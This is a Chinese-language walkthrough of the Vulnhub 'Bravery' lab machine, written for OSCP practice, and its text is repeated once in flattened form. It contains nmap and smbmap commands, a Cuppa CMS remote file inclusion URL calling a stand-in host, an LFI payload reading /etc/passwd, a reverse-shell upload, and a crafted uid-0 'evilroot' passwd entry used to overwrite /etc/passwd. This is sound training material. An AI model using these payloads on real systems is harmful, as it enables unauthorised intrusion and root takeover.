OSCP-Vulnhub靶机记录-bravery-walkthrough

字数 1221 2025-08-12 11:34:39

OSCP/Vulnhub靶机渗透实战：Bravery靶机完整攻略

靶机概述

Bravery是一款来自Vulnhub的中级难度靶机，适合OSCP备考练习。该靶机包含多种常见漏洞利用方式，包括：

Web应用漏洞利用
敏感信息泄露
服务枚举与利用
权限提升技术

靶机下载地址：Digitalworld.local: Bravery

初始信息收集

1. 网络扫描

首先使用nmap扫描网络中的存活主机：

nmap -sP 192.168.160.0/24

发现靶机IP为192.168.160.128

2. 端口与服务扫描

使用自动化脚本进行详细扫描：

./nmapAuto -H 192.168.160.128 -t All

扫描结果：

PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
3306/tcp  open  mysql
8080/tcp  open  http-proxy
20048/tcp open  mountd
37904/tcp open  unknown
43859/tcp open  unknown

详细服务信息：

8080端口运行nginx 1.12.2
- robots.txt显示4个禁止目录：
```
/cgi-bin/
/qwertyuiop.html 
/private
/public
```
80端口运行Apache httpd 2.4.6 (CentOS)
- 发现以下有趣路径：
```
/phpinfo.php
/README.txt
/icons/
/uploads/
```

Web应用渗透

1. 敏感信息发现

在/uploads/files/internal/department/procurement/sara/note.txt发现提示：

系统使用Cuppa CMS

2. Cuppa CMS漏洞利用

搜索发现Cuppa CMS存在远程文件包含(RFI)漏洞：

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?

或本地文件包含(LFI)：

http://target/cuppa/alerts/alertConfigField.php?urlConfig=etc/passwd

但直接尝试失败，需要找到Cuppa CMS的实际安装路径。

3. SMB/NFS服务利用

使用smbmap扫描SMB服务：

smbmap -H 192.168.160.128

结果：

Disk        Permissions Comment
anonymous   READ ONLY   secured
NO ACCESS   IPC$        IPC Service (Samba Server 4.7.1)

挂载anonymous共享：

mount -t cifs //192.168.160.128/anonymous /mnt -o username=guest

在共享中发现用户名genevieve，这可能是Cuppa CMS的管理员。

4. 获取CMS绝对路径

通过枚举发现Cuppa CMS登录界面，并在页面源码中泄露了绝对路径：

http://192.168.160.128/genevieve/cuppaCMS/

5. 成功利用LFI漏洞

使用已知路径构造有效载荷：

http://192.168.160.128/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=/etc/passwd

成功读取系统文件。

6. 获取Web Shell

修改PHP反向Shell脚本（如pentestmonkey的php-reverse-shell.php），设置监听IP和端口后上传执行，获得初始shell。

权限提升

1. 初始访问

获得的shell以apache用户身份运行，需要提权。

2. 查找SUID文件

执行：

find / -perm -u=s -type f 2>/dev/null

查找具有SUID权限的可执行文件。

3. 密码文件篡改提权

将靶机的/etc/passwd复制到Kali

使用openssl生成加密密码：

openssl passwd -1 -salt abc password123

在passwd文件中添加root权限用户：

evilroot:$1$abc$qWG3wE5UZxNoYpTCjUY9k.:0:0::/root:/bin/bash

将修改后的passwd文件传回靶机覆盖原文件
使用添加的用户登录获取root权限

4. 替代方法（通过NFS）

根据其他攻略，还可以：

挂载NFS共享：
```
mount -t nfs 192.168.160.128:/ /mnt
```
在共享中找到加密盘的明文密码
使用该密码进行权限提升

总结

本靶机渗透过程关键点：

通过全面端口扫描发现所有开放服务
利用robots.txt和目录枚举发现敏感信息
利用Cuppa CMS已知漏洞进行文件包含攻击
通过SMB/NFS共享获取关键信息
使用密码文件篡改技术实现权限提升

此靶机涵盖了从信息收集到权限提升的完整渗透流程，是练习综合渗透能力的优秀资源。

OSCP/Vulnhub靶机渗透实战：Bravery靶机完整攻略靶机概述 Bravery是一款来自Vulnhub的中级难度靶机，适合OSCP备考练习。该靶机包含多种常见漏洞利用方式，包括： Web应用漏洞利用敏感信息泄露服务枚举与利用权限提升技术靶机下载地址： Digitalworld.local: Bravery 初始信息收集 1. 网络扫描首先使用nmap扫描网络中的存活主机：发现靶机IP为 192.168.160.128 2. 端口与服务扫描使用自动化脚本进行详细扫描：扫描结果：详细服务信息： 8080端口运行nginx 1.12.2 robots.txt显示4个禁止目录： 80端口运行Apache httpd 2.4.6 (CentOS) 发现以下有趣路径： Web应用渗透 1. 敏感信息发现在 /uploads/files/internal/department/procurement/sara/note.txt 发现提示：系统使用Cuppa CMS 2. Cuppa CMS漏洞利用搜索发现Cuppa CMS存在远程文件包含(RFI)漏洞：或本地文件包含(LFI)：但直接尝试失败，需要找到Cuppa CMS的实际安装路径。 3. SMB/NFS服务利用使用smbmap扫描SMB服务：结果：挂载anonymous共享：在共享中发现用户名 genevieve ，这可能是Cuppa CMS的管理员。 4. 获取CMS绝对路径通过枚举发现Cuppa CMS登录界面，并在页面源码中泄露了绝对路径： 5. 成功利用LFI漏洞使用已知路径构造有效载荷：成功读取系统文件。 6. 获取Web Shell 修改PHP反向Shell脚本（如pentestmonkey的php-reverse-shell.php），设置监听IP和端口后上传执行，获得初始shell。权限提升 1. 初始访问获得的shell以apache用户身份运行，需要提权。 2. 查找SUID文件执行：查找具有SUID权限的可执行文件。 3. 密码文件篡改提权将靶机的 /etc/passwd 复制到Kali 使用openssl生成加密密码：在passwd文件中添加root权限用户：将修改后的passwd文件传回靶机覆盖原文件使用添加的用户登录获取root权限 4. 替代方法（通过NFS）根据其他攻略，还可以：挂载NFS共享：在共享中找到加密盘的明文密码使用该密码进行权限提升总结本靶机渗透过程关键点：通过全面端口扫描发现所有开放服务利用robots.txt和目录枚举发现敏感信息利用Cuppa CMS已知漏洞进行文件包含攻击通过SMB/NFS共享获取关键信息使用密码文件篡改技术实现权限提升此靶机涵盖了从信息收集到权限提升的完整渗透流程，是练习综合渗透能力的优秀资源。